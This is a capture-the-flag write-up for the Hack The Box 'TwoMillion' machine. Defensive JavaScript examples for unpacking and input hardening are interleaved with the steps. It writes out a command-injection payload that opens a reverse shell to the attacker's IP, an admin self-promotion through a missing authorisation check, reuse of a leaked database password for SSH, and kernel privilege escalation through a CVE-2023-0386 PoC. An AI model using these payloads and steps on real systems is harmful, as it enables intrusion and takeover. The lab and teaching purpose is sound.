Information gathering

nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- -min-rate 10000 10.10.11.221
[sudo] kali 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-26 16:03 CST
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,22 10.10.11.221
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-26 16:03 CST
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.13s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Hack The Box :: Penetration Testing Labs
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directories and subdomains

The directory scan turns up nothing:

sudo dirsearch -u http://2million.htb

The main domain name comes from the nmap scan output, so add it to /etc/hosts (the privilege has to apply to the write itself: with `sudo echo ... >> /etc/hosts` the redirection runs as the unprivileged user and fails, so pipe through tee instead):

echo "10.10.11.221 2million.htb" | sudo tee -a /etc/hosts

www-data

Invite code

Clicking Join redirects to /invite,

which asks for an invite code.

Registration also requires an invite code.

Opening the developer tools (F12) on the /invite page reveals a JS file named inviteapi.min.js with the following content:

Even though the JS is obfuscated, the verifyInviteCode and makeInviteCode functions are clearly visible.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 i(4){h 8={"4":4};$.9({a:"7",5:"6",g:8,b:\'/d/e/n\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:"7",5:"6",b:\'/d/e/k/l/m\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}',24,24,'response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify'.split('|'),0,{}))

Calling the makeInviteCode function from inviteapi.min.js in the browser console returns:

Object { data: "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr", enctype: "ROT13" }

Decoding it with an online ROT13 tool gives:

In order to generate the invite code, make a POST request to /api/v1/invite/generate
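The obfuscation above is the common `p,a,c,k,e,d` packer: every `\w+` token in the packed string is a base-24 index into the word list, and the `eval` simply rebuilds the source. As an added example (not part of the original write-up or the site's own code), the following re-implements that decoder so the file can be unpacked for review without evaluating it, lists the API paths it references, and performs the ROT13 step used for the makeInviteCode hint. The packed string, word list, radix and the ROT13 text are copied from the page; the helper names are my own.

```javascript
// Packed payload, word list and parameters copied from inviteapi.min.js as shown on the page.
const PACKED = '1 i(4){h 8={"4":4};$.9({a:"7",5:"6",g:8,b:\'/d/e/n\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:"7",5:"6",b:\'/d/e/k/l/m\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}';
const WORDS = 'response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify'.split('|');
const RADIX = 24; // the packer's `a`
const COUNT = 24; // the packer's `c`

// Static equivalent of the packer's self-unpacking function: build the token -> word
// dictionary (token = index written in base `radix`), then substitute every \w+ token.
// Unlike the original, unknown tokens are left alone instead of becoming "undefined".
function unpackPacker(packed, radix, count, words) {
  const dict = new Map();
  for (let i = count - 1; i >= 0; i--) {
    const token = i.toString(radix);
    dict.set(token, words[i] || token); // an empty word slot means the token stands for itself
  }
  return packed.replace(/\b\w+\b/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

// Pull out every quoted /api/v1 path from the unpacked source (what an auditor wants from this file).
function extractApiPaths(js) {
  const found = new Set();
  for (const m of js.matchAll(/['"](\/api\/v1[^'"]*)['"]/g)) found.add(m[1]);
  return [...found];
}

// ROT13 over ASCII letters only; digits, punctuation and '/' are untouched.
function rot13(text) {
  return text.replace(/[A-Za-z]/g, (ch) => {
    const base = ch <= "Z" ? 65 : 97;
    return String.fromCharCode(((ch.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// The makeInviteCode response carries its own `enctype`; dispatch on it rather than guessing.
function decodeInviteHint(response) {
  if (response.enctype !== "ROT13") throw new Error(`unsupported enctype: ${response.enctype}`);
  return rot13(response.data);
}

const unpackedSource = unpackPacker(PACKED, RADIX, COUNT, WORDS);
console.log(unpackedSource);
console.log(extractApiPaths(unpackedSource));
console.log(decodeInviteHint({
  data: "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr",
  enctype: "ROT13",
}));
```

Unpacking statically rather than with `eval` matters when the file under review is untrusted: the decoder only does string substitution, so nothing in the payload runs. The `extractApiPaths` pass is the part worth keeping in a review checklist, since packed client-side scripts routinely hide endpoints like the invite routes seen here.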

Send the POST request, then base64-decode the result to obtain the invite code:

┌──(kali㉿kali)-[~]
└─$ curl -X POST http://2million.htb/api/v1/invite/generate
{"0":200,"success":1,"data":{"code":"SUFGNE4tN1FHSVEtN0o3WUYtUThBVjA=","format":"encoded"}}

┌──(kali㉿kali)-[~]
└─$ echo "SUFGNE4tN1FHSVEtN0o3WUYtUThBVjA=" | base64 -d
IAF4N-7QGIQ-7J7YF-Q8AV0

Entering the invite code at /invite redirects to /register with the code pre-filled.

Register an arbitrary account and log in.

Obtaining admin privileges

Clicking "Connection Pack" on /home/access and capturing the request reveals an API that downloads an .ovpn file.

Standard API probing:

GET /api/v1/user/vpn HTTP/1.1
GET /api/v1/user HTTP/1.1
GET /api/v1 HTTP/1.1

/api/v1 returns content: a list of every API endpoint together with what it does.

{
"v1":{
"user":{
"GET":{
"\/api\/v1":"Route List",
"\/api\/v1\/invite\/how\/to\/generate":"Instructions on invite code generation",
"\/api\/v1\/invite\/generate":"Generate invite code",
"\/api\/v1\/invite\/verify":"Verify invite code",
"\/api\/v1\/user\/auth":"Check if user is authenticated",
"\/api\/v1\/user\/vpn\/generate":"Generate a new VPN configuration",
"\/api\/v1\/user\/vpn\/regenerate":"Regenerate VPN configuration",
"\/api\/v1\/user\/vpn\/download":"Download OVPN file"
},
"POST":{
"\/api\/v1\/user\/register":"Register a new user",
"\/api\/v1\/user\/login":"Login with existing user"
}
},
"admin":{
"GET":{
"\/api\/v1\/admin\/auth":"Check if user is admin"
},
"POST":{
"\/api\/v1\/admin\/vpn\/generate":"Generate VPN for specific user"
},
"PUT":{
"\/api\/v1\/admin\/settings\/update":"Update user settings"
}
}
}
}

Our account is only a regular user;

the admin endpoints return 401 Unauthorized, so we have no permission there.

Eventually it turns out that the /api/v1/admin/vpn/generate API endpoint can change a user account into an admin account.

At first it returns an error about the data type.

Adding "Content-Type: application/json" returns a missing-parameter error for "email".

Adding an "email" field returns a missing-parameter error for "is_admin".

It then reports that "is_admin" may only be 0 or 1.

Finally the account is successfully changed to admin.
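The error chain above shows that the endpoint validates the shape of the request (content type, `email`, `is_admin` in {0,1}) but never checks who is calling it, so a regular user can set `is_admin` on their own account. As an added example (not the box's own code), here is a minimal settings-update handler written both ways. The in-memory user store, the session object and the response messages are constructed for illustration; only the validation order mirrors what the page reports.

```javascript
// Constructed sample users: the site's admin and the account we registered ourselves.
function makeUserStore() {
  return new Map([
    ["admin@2million.htb", { id: 1, email: "admin@2million.htb", is_admin: 1 }],
    ["test@2million.htb", { id: 2, email: "test@2million.htb", is_admin: 0 }],
  ]);
}

// Shape validation shared by both handlers, in the order the endpoint reports errors.
// Note what it does NOT do: it never asks whether the caller is allowed to do this.
function validateSettingsRequest(store, contentType, body) {
  if (contentType !== "application/json") return { status: 400, message: "Invalid content type." };
  if (!body || body.email === undefined) return { status: 400, message: "Missing parameter: email" };
  if (body.is_admin === undefined) return { status: 400, message: "Missing parameter: is_admin" };
  if (body.is_admin !== 0 && body.is_admin !== 1) {
    return { status: 400, message: "Variable is_admin needs to be either 0 or 1." };
  }
  if (!store.has(body.email)) return { status: 400, message: "User not found." };
  return null;
}

function applySettings(store, body) {
  const user = store.get(body.email);
  user.is_admin = body.is_admin;
  return { status: 200, id: user.id, username: user.email, is_admin: user.is_admin };
}

// Vulnerable: any logged-in caller that passes validation can flip is_admin for any user,
// including themselves. Authentication is checked; authorisation is not.
function updateSettingsVulnerable(store, session, contentType, body) {
  if (!session) return { status: 401, message: "Unauthorized" };
  const err = validateSettingsRequest(store, contentType, body);
  return err || applySettings(store, body);
}

// Hardened: the caller's role is looked up server-side from the session's identity,
// never taken from the request body, and non-admins are refused before validation.
function updateSettingsHardened(store, session, contentType, body) {
  if (!session) return { status: 401, message: "Unauthorized" };
  const caller = store.get(session.email);
  if (!caller || caller.is_admin !== 1) return { status: 403, message: "Forbidden" };
  const err = validateSettingsRequest(store, contentType, body);
  return err || applySettings(store, body);
}

function demoSettingsUpdate() {
  const caller = { email: "test@2million.htb" }; // session of the account we registered
  const promoteSelf = { email: "test@2million.htb", is_admin: 1 };
  console.log(updateSettingsVulnerable(makeUserStore(), caller, "application/json", promoteSelf)); // status 200
  console.log(updateSettingsHardened(makeUserStore(), caller, "application/json", promoteSelf));   // status 403
}
demoSettingsUpdate();
```

The hardened variant also illustrates the detection angle: a regular user's session reaching an `/admin/` route at all is worth logging, and a 200 from such a route is the signal that the authorisation check is missing.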

Command injection

/api/v1/admin/vpn/generate is also an endpoint that generates an .ovpn file. The VPN keys are probably not generated by PHP code itself but by some Bash tooling that produces the material a VPN key needs, so it is worth checking for command injection.

If the server runs something like gen_vpn.sh [username], then I'll try putting a ; in the username to break it into a new command, and add a # at the end to comment out anything that might follow my input. This confirms that the /api/v1/admin/vpn/generate endpoint is vulnerable to command injection.

Get a reverse shell back to the attacking machine. Start a listener:

nc -lnvp 5555

The POST request body is:

{
"username":"test; bash -c 'bash -i >& /dev/tcp/10.10.16.17/5555 0>&1';#"
}
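The injection works because the username is spliced into a shell command line, where `;` and `#` are parsed as command separator and comment. As an added example (not the application's own code), the following shows that vulnerable shape next to the hardened one: validate the username against an allow-list and pass it as a single argv element, so no shell ever sees it. The script path, the allow-list and the sample inputs are hypothetical or constructed.

```javascript
// Vulnerable shape: one string that a shell will parse. The shell sees the whole line, so a ';'
// inside `username` ends the intended command and a trailing '#' discards whatever followed it.
function buildShellLineVulnerable(username) {
  return `/bin/bash /var/www/html/gen_vpn.sh ${username}`; // hypothetical script path
}

// Allow-list for usernames: a conservative character set with a bounded length.
const USERNAME_RE = /^[A-Za-z0-9_.-]{1,32}$/;

// Hardened shape: validate first, then build an argv vector. Passing this to
// child_process.execFile(file, args) runs the helper without a shell, so the username is
// always exactly one argument no matter what characters it contains.
function buildArgvHardened(username) {
  if (typeof username !== "string" || !USERNAME_RE.test(username)) {
    throw new Error("invalid username");
  }
  return { file: "/bin/bash", args: ["/var/www/html/gen_vpn.sh", username] };
}

// Log-review aid: characters that mean something to sh. Flagging them in request parameters for
// this endpoint is a cheap detection signal; it is not a substitute for the allow-list above.
const SHELL_META_RE = /[;&|`$(){}<>#'"\\\r\n]/;
function hasShellMetachars(value) {
  return SHELL_META_RE.test(value);
}

function demoCommandInjection() {
  const benign = "test";
  const hostile = "test; echo injected;#"; // constructed: same shape as the write-up's payload, harmless
  console.log(buildShellLineVulnerable(hostile)); // a shell would run two commands here
  console.log(buildArgvHardened(benign).args);    // [ '/var/www/html/gen_vpn.sh', 'test' ]
  try {
    buildArgvHardened(hostile);
  } catch (e) {
    console.log("rejected:", e.message);
  }
  console.log(hasShellMetachars(benign), hasShellMetachars(hostile)); // false true
}
demoCommandInjection();
```

Rejecting on the allow-list rather than stripping metacharacters keeps the failure loud and avoids bypasses through encodings the stripper did not anticipate; `execFile` with an argument array, not `exec` with a concatenated string, is the structural fix.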

After the reverse shell comes back, there is an admin user:

www-data@2million:~/html$ ls -l /home
drwxr-xr-x 6 admin admin 4096 Jan 26 07:50 admin

The .env file in the web application's root directory contains the database password for the user admin:

www-data@2million:~/html$ cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

Spawn a pseudo-terminal and connect to the database; nothing exploitable is found in it.

python3 -c "import pty;pty.spawn('/bin/bash')"

Try the database password for SSH as admin:

ssh admin@10.10.11.221
password:SuperDuperPass123

user_admin

The SSH login succeeds, and the login banner shows this:

You have mail.
Last login: Fri Jan 26 08:53:41 2024 from 10.10.14.6

Use find to locate files named 'mail':

admin@2million:~$ find / -name "mail" 2>/dev/null
/snap/core20/1891/var/mail
/snap/core20/1891/var/spool/mail
/var/spool/mail
/var/mail
/usr/lib/python3/dist-packages/twisted/mail
/usr/lib/byobu/mail

Given what each of these directories is for, the mail is almost certainly under /var.

It mentions the keywords OverlayFS / FUSE, which suggests this machine's kernel is affected:

admin@2million:~$ cat /var/mail/admin 
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

user_root

I just put the keywords into Google; the results already expose some exploits.

The first Google result is CVE-2023-0386; the article states that if the system's kernel version is lower than 6.2, the system may be vulnerable.

admin@2million:~$ uname -a
Linux 2million 5.15.70-051570-generic #202209231339 SMP Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
admin@2million:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04.2 LTS"

A PoC for this vulnerability is available on GitHub. Its README.md is short but gives enough usage instructions.

I cloned it locally with git, then served it with Python's HTTP server to transfer the PoC to the target:

python3 -m http.server

wget -r http://10.10.16.17:8000/CVE-2023-0386

Then follow README.md.

Build:

make all

Usage

Open two terminals. In the first, run:

./fuse ./ovlcap/lower ./gc

In the second:

./exp

Privilege escalation to root succeeds.